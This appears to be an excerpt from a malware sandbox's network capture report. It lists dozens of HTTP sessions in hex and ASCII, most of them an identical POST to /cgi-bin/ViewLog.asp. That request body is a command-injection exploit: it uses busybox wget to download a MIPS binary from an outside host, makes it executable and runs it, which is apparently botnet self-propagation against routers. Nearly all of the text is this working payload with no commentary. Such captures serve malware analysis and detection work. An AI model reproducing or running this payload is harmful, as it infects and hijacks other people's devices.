                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              814192.168.2.135540094.55.177.2198080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:20.643038034 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:21.414158106 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              815192.168.2.135100894.122.64.2528080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:21.079008102 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              816192.168.2.135109695.140.192.38080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:21.094355106 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              817192.168.2.133616085.90.244.228080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:21.504451990 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:22.077323914 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:22.260193110 CET683INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:18:22 GMT
                                              Server: Apache/2.4.58 (Unix)
                                              Content-Length: 437
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              818192.168.2.135747462.84.123.1768080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:21.508024931 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:21.725734949 CET90INHTTP/1.1 404 Not Found


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              819192.168.2.135399085.73.46.598080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:21.518068075 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              820192.168.2.135754694.121.176.1438080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:21.547122955 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              821192.168.2.134033094.121.187.218080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:21.761956930 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              822192.168.2.134973294.120.57.1228080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:21.775012970 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              823192.168.2.135204285.30.146.258080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:21.819981098 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              824192.168.2.133838631.136.75.1628080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:21.856669903 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              825192.168.2.134961894.122.61.798080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:21.864682913 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              826192.168.2.136040894.120.4.178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:21.865863085 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              827192.168.2.134147095.86.89.1528080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:21.871192932 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              828192.168.2.1352536106.53.18.2123
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:21.883613110 CET219INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 37 3a 33 30 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 49 6e 76 61 6c 69 64 20 75 73 65 72 2e
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:17:30Auth Result: Invalid user.


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              829192.168.2.135239831.136.159.1218080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:21.912106991 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:22.502171993 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              830192.168.2.134129495.214.178.2218080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:21.935656071 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              831192.168.2.135763894.25.159.1738080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:21.958705902 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
